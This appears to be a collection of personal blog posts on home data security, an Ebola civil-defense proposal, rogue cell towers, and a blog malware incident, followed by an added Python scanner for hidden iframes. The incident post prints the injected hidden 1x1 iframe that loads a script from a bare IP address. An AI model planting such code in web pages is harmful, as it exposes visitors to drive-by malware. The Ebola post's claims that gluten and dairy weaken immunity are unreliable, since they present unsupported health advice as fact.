I think the real bottom line is… how do companies and individuals protect themselves and still thrive under the very real reality that global tensions influence the security of data online?
“The iPhone 6 Plus may be bending in people’s pockets and under the pressure of tough hands, but it’s not bending to the will of the US National Security Agency NSA any longer.” – inverse.com
Very nice to hear the iPhone 6 can defeat the NSA; I just don’t think I believe it. It’s also a little bit funny that Apple would leverage this slippery topic (NSA domestic spying) to market their phones – but maybe it will help this very real issue be taken more seriously by the mainstream.
Why am I skeptical about their data encryption claims? I’m not sure anyone really knows what a hacker can hack unless that hacker makes it known to you. For all I know the CIA & NSA can decrypt MD5 and other hashes. If they choose to watch and leave no trace of their visit – how would I know they were here? Oh sure I could analyze logs and hope intruder detection software works – but a clever hacker may be able to access any connected system.
Hidden Bunkers are Better than Castles – I think of encryption like a fortress. Any fortress can be taken, any defense defeated, it’s a historical fact. So a slightly better strategy may be camouflage. Instead of putting your data in an encrypted vault that has a big sign on it saying ‘SAFE’, put it in a hidden safe – or don’t put it online at all. In other words think hidden bunker versus castle because if they don’t even know you’re there, they can’t get you. (Good strategy for the Zombie Apocalypse too!)
Camouflaged Bunkers with Secret Doors are Better than Bunkers – If you can’t hide the fact that you exist, consider a camouflage deception. For example, if you keep passwords on your computer put some fake passwords and accounts in a fake file named ‘My Passwords’. Then somewhere else, under an inconspicuous filename, put the real passwords file and create a simple, easy to remember ‘decryption code’ that you keep in your head and can use on-the-fly.
In other words use a self-invented Pig Latin decryption key. Don’t use Pig Latin itself – too easy to decrypt, but invent something as easy to remember. Here’s a Pig Latin refresher:
- pig => igpay
- banana => ananabay
- trash => ashtray
Like I said, while this particular method would be easy to guess, it illustrates the idea. To take it the next level you might consider some of the following ideas:
- Add two random characters to the front or back of your recorded passwords. You simply remember to ignore the first or last characters. This would be very easy to remember but easier to crack too.
- In the real passwords use certain numbers for letters that resemble them like 8 for B or 7 for L. Then when using the password you just remember Bs are actually 8s.
- Record correctly spelled words in passwords (which is a terrible thing to do for real passwords) then remember your preferred misspelling of that word in the true password. For example, 1Password! might really be 1Pazzwerd!
- Flip two word passwords around. For example, record a password like, 1badpassword! but really use password!1bad.
- If you flip things around in any way, like letters or words, be sure they look more correct in their encrypted form. This way the obvious decryption is not easy to spot. For example, if the encrypted password is: 1RedBird! the true password could be: Bird!1Red. The capital letter in the middle of the string shows you where to flip it and RedBird actually makes sense so it just looks like a bad but real password. You could step it up and always replace certain letters with numbers like: 8ird!1R3d (capital B is 8 -and- e is 3).
So why go through this? Hackers hack, and if they can get into big corporations like Target & Home Depot they can hack your computer. Most of the time professional hackers are going to focus on the castles because the loot is more plentiful, but home networks are easy prey.
Many times home networks are insecure and have wide open holes via printers and other networked devices. So the information on our computers is vulnerable, especially if we leave our computers on all the time without firewalls enabled. With automated tools hackers can scan the Internet in their sleep looking for vulnerable systems, so even though your system may not look like a gold mine, the bots may still visit and test your security.
These little Pig Latin Encryption tricks may seem extreme, but they could be your last line of defense if someone were to hack your machine. The hacker would think they have your password list, but in truth they would have to spend real time (as opposed to automated bot time) to noodle-through your password encryption – assuming they thought you had implemented one. It’s more likely that they would just give up and move on.
You can do the same thing with credit card numbers, driver’s license numbers, social security numbers, and so on – assuming you already keep a list of those things on your computer.
But the true last line is to simply keep these things written in a little book in your pocket. But if you do that, definitely use a Pig Latin Decryption system since that little black book may someday go missing too, and that would suck.
I always try to post solutions for the problems I call out in my posts. It just seems to be the right thing to do… if you don’t think something is being done right, suggest another way to go. These ideas often get buried in my posts. This is a repost of an idea I posted in response to what I’d characterize as Obama’s mishandling of the Ebola problem. You can see the original post here. Here’s the idea:
…This is an opportunity to kick-off a health-centric civil defense program, which might even help promote and support Obamacare indirectly.
The primary core message for jump-starting this program would be confronting Ebola head-on with an overwhelming force. It’s not an over-reaction to fear but a calculated asymmetrical assault on the disease that confronts every possible avenue this enemy could take. It’s not a war on Ebola, which would be too cliche, but a strategically overwhelming response that closes all gaps for this disease to spread.
Such a bold move could also earn President Obama serious kudos. Instead of attempting to downplay the risk, which the public sees as weakness and avoidance, he could use the appointment of Ron Klain as the catalyst for this shift in approach.
Immediate actions for a health-centric civil defense program could be:
- Encourage people to build-up their immune systems. Make it widely known that eating less gluten, dairy, fast food, manufactured food, etc, weakened the immune system and increases an individual’s chance of beating any bug. Strengthened immune systems start with a healthy gut. When your gut is clogged with cheese, gluten, and empty calories they become a breeding ground for bad gut flora, and your health deteriorates.
- Develop and distribute a Home Ebola Early Detection Kit along with the necessary personal protective (PPE) gear and information to help people isolate households where Ebola is discovered. This should be as easy to use as a home pregnancy kit and come in easy safe disposal packaging.
- Encourage people to wear PPE gear as soon as they feel sick or travel in public – even if Ebola has not reached their area. Gloves and an N95 mask, plus good safe handling measures (avoid touching face, or unnecessarily touching surfaces) can give someone an edge over any contagious disease including the flu.
- Be ready to distribute supplies and care information to households where Ebola emerges. This will help folks voluntarily shelter in place for long time periods. At some point hospitals may not have space or adequate numbers of healthcare workers to handle a growing number of Ebola patients. If this happens we will need a back-up plan ready to roll. The most obvious next step would be to empower people to shelter in place and care for themselves.
- Provide people with assurances that they will not lose their jobs or income if their household needs to be quarantined. I realize this could get very expensive financially, but giving people the security to isolate themselves should help eliminate the pressure to leave their quarantine.
- Build a robust plan to keep public utilities operational like the power grid, water system, trash pickup, and sewer. Work immediately to decentralize the power grid to eliminate key points of failure and improve the overall robustness of the grid.
- Immediately ramp-up the manufacture of PAPR (Powered Air Purifying Respirator) forced air breathing units and other necessary PPE gear. While the current message from the WHO and CDC says that Ebola is not airborne, others suggest that it can be under certain situations. So as an informed precaution give healthcare workers and emergency responders the best PPE possible. This will also help keep people on the job longer.
- Until the danger has passed, improve control at the borders. Require waiting periods of up to several days to monitor for signs of infection. Use disaster relief housing units at the borders as temporary housing.
Consider making this kind of civil defense program international since the problem can travel everywhere. Then, like the powers-that-be are already suggesting, ramp up the international response in Africa. Heading off the disease at its source should be the top priority.
So just to recap… where I disagree with the White House is in the domestic approach, not the efforts in Africa.
What to Do?
I’m skeptical that our government is capable of implementing anything like this, or inclined to do so, so we should consider these kinds of measures for ourselves. Things you can do right now are:
- Learn how to improve your own immune system and make those changes now.
- Acquire basic PPE gear now (N95 masks, gloves, etc), and learn how to use it in an emergency.
- Be ready to shelter in place for an extended time.
- Reduce your exposure to all pathogens by limiting travel and unnecessary activities outside the home.
- Prepare back-up plans for electricity, water, and sewer.
An Ebola epidemic in America is on the table. We must not give in to fear and respond stupidly, but we should not cling to the idea that everything is under control until the American people themselves feel empowered to defend themselves against this enemy.
“So-called rogue cell phone towers, the type that can intercept your mobile calls and data, are cropping up all over the United States, including here in Chicago, according to a company that specializes in developing highly secure mobile phones…
ESD America’s cellphones protect users’ data, phone calls and text. The phone looks like a typical Android phone, but the inside includes encryption algorithms developed by a German company, GSMK, that protects the phone from intercepts.” – CBS Chicago
Hackers & thieves are clever buggers. Amazing the lengths they will go to turn a buck. Seems like the best hedge right now is to watch your bill and store no secure data on your phone, like credit cards, social security number, driver’s license number, and passwords.
It seems to be a normal practice for network device manufacturers (like HP and IOmega) to leave the password protection wide open on all sorts of network devices like printers, scanners, security camera systems, network storage devices, and so on.
I suspect this is done to make the devices easier to install and use, increasing their user friendly feel while lowering the cost to support. Sadly the side effect is that hackers can easily connect to these devices and access your saved data. So while your computer may be secure with a password, your network devices may be wide open to hacking.
To protect yourself dive back into the manuals for your home network devices and learn how to activate the security functionality. Be sure to pick a difficult password to break that contains numbers, special characters, and most importantly words not found in any dictionary.
This morning at about 8AM my fellow tiny house blogger, Kent Griswold, let me know that this site was creating a security alert in Safari. The alert said that my site contained Malware. Immediately I started digging and within 20 minutes had figured it out. I’m not sure how it was done but a little tiny bit of code was stuck into one of my posts. Here is the code. Don’t worry it’s disabled but I would not recommend visiting that website.
<!-- Web Stats --> <iframe src=http://126.96.36.199/stats.php?id=2 width=1 height=1 frameborder=0></iframe> <!-- End Web Stats -->
It was only partly visible in HTML view; the iframe wouldn’t render so it looked virtually invisible. I changed my password, locked down my comments, and tightened up security. I suspect there may be a security hole in the current version of WordPress, but who knows, it could have been some plug-in I was testing too.
I’m going to spend a little time later tonight changing passwords on all my blogs and doing what I can to protect myself. If you run blogs I suggest you try doing some searches for Malware too.
Lucky for me they picked my least busy blog, this one, my personal blog. It would seriously suck if my top blogs popped up warning screens like this one to all my visitors. Fricken hacker bastages!
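A scanner for the kind of search suggested above, as an added example (not code from the original post): it parses post HTML and flags iframes that are only a pixel or two in size, hidden by inline style, or loaded from a bare IP address, which are the traits of the injected snippet shown earlier. The post ids, post bodies and the 203.0.113.7 address are constructed sample data; in practice the bodies would come from an export of your blog's posts.

```python
import ipaddress
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

HIDDEN_STYLE = re.compile(r"display\s*:\s*none|visibility\s*:\s*hidden", re.I)

def is_tiny(value):  # width/height of 0-2 pixels, e.g. "1" or "0px"
    m = re.fullmatch(r"\s*(\d+)\s*(px)?\s*", value or "")
    return bool(m) and int(m.group(1)) <= 2

def has_ip_host(src):  # frame source names a bare IP address, not a domain
    try:
        ipaddress.ip_address(urlparse(src if "//" in src else "//" + src).hostname or "")
    except ValueError:
        return False
    return True

class IframeAudit(HTMLParser):
    def __init__(self):
        super().__init__()
        self.findings = []  # (src, reasons) per suspicious iframe

    def handle_starttag(self, tag, attrs):
        if tag != "iframe":
            return
        a = {name: value or "" for name, value in attrs}
        checks = [("tiny", is_tiny(a.get("width")) or is_tiny(a.get("height"))),
                  ("hidden-style", bool(HIDDEN_STYLE.search(a.get("style", "")))),
                  ("ip-host", has_ip_host(a.get("src", "")))]
        reasons = [name for name, hit in checks if hit]
        if reasons:
            self.findings.append((a.get("src", ""), reasons))

def scan_post(html):
    audit = IframeAudit()
    audit.feed(html)
    audit.close()
    return audit.findings

# Constructed sample post bodies keyed by post id; 203.0.113.7 is a documentation address.
POSTS = {
    101: "<p>Plans</p><!-- Web Stats --> <iframe src=http://203.0.113.7/stats.php?id=2 width=1 height=1 frameborder=0></iframe>",
    102: '<iframe src="https://www.youtube.com/embed/abc123" width="560" height="315"></iframe>',
    103: '<iframe src="https://widgets.example.net/t" style="display:none"></iframe>',
}

if __name__ == "__main__":
    for post_id, html in POSTS.items():
        print(post_id, scan_post(html) or "clean")
```

A hit is a prompt to look at the post by hand, since legitimate embeds occasionally use hidden or tiny frames too.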